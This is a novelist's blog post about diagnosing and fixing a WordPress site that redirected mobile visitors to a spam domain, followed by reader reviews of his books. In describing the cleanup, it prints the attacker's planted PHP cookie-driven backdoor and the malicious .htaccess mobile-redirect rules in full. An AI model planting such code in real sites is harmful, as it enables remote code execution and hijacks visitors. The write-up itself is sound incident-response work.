Skip to content

Category: Software

Fixing a WordPress Redirect Hack

So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device. The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into think you’re an iPhone and trigger the redirect. I did just that, tried to look at the network events, javascript debugger, etc., but found nothing! The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean. Then I turned my attention to the uploads folder. I found this file and couldn’t figure out what it did. daniel@bffserver [~]# cat psvkwrmv.php.fart –?php $oewzo=$_COOKIE; $ycke=$oewzo[zutc]; if($ycke){ $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf(“”,$gpjc);$fyup(); I ran it through the hex, base64, and php decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory. Then I found the culprit! Here are the contents of the .htaccess file in the uploads directory: RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC] RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L] You son of a bitch .htaccess file! Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file that should look like this: dverast@dougherty:~/danielverastiqui.com$ cat .htaccess # BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ – [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] If you need to find all the affected .htaccess files quickly, you can use grep: daniel@bffserver [~]# grep -lR “luxurytds.com” . grep: ./access-logs: No such file or directory ./www/blog/backup-1408304576-wp-admin/.htaccess ./www/blog/backup-1408304576-wp-includes/.htaccess ./www/blog/backup-1500088171-wp-admin/.htaccess ./www/blog/backup-1500088171-wp-includes/.htaccess ./www/blog/wp-content/backup-1500088171-themes/.htaccess ./www/blog/wp-content/backup-1408304576-themes/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/.htaccess ./www/blog/wp-content/backup-1408304576-plugins/.htaccess ./www/cgi-bin/.htaccess ./public_html/blog/backup-1408304576-wp-admin/.htaccess ./public_html/blog/backup-1408304576-wp-includes/.htaccess ./public_html/blog/backup-1500088171-wp-admin/.htaccess ./public_html/blog/backup-1500088171-wp-includes/.htaccess ./public_html/blog/wp-content/backup-1500088171-themes/.htaccess ./public_html/blog/wp-content/backup-1408304576-themes/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess ./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess ./public_html/cgi-bin/.htaccess After I deleted every .htaccess file and replaced them with defaults or recommended, the site stopped redirecting. Success! However: I still don’t know exactly how the .htaccess files were being invoked. I mean, I kinda do, but in a much more real way, I have no idea. Would be interested to know for sure.…

Recent Reviews

Perion Synthetics is a great read. If you are not familiar with the author, then I would highly recommend checking out the latest addition to his collection. It is masterfully written, thoughtfully put together, and the chapter arrangement is a refreshing change from your standard “near future” fiction. I would eagerly recommend this to both new comers and die-hards alike, I won’t spoil anything for you, but let’s just say you’re in for a treat!

Justin Ellis – Perion Synthetics

The Possible Future. Really enjoyed this book by Daniel Verastiqui. The future Verastiqui paints is one that feels not far from the realm of the possible. Of course this future world is still controlled by two super-corporations, but simulated human technology has begun to blur the lines between the artificial and the real. The book brings up fascinating ethical questions that could arise as machines become more and more like living beings. As the plot moves forward it becomes more and more apparent that at some point mankinds’ creations could begin to operate outside of the control of humans, and it’s a scary but interesting world to consider. I’ve read Verastiqui’s other books, and I really like how he ties the characters, corporations, and events to each other from book to book. One can easily begin to believe the the mega-corporations of tomorrow could easily look like Vinestead and Perion Synthetics.

Todd Pruner – Perion Synthetics
© 2018 Daniel Verastiqui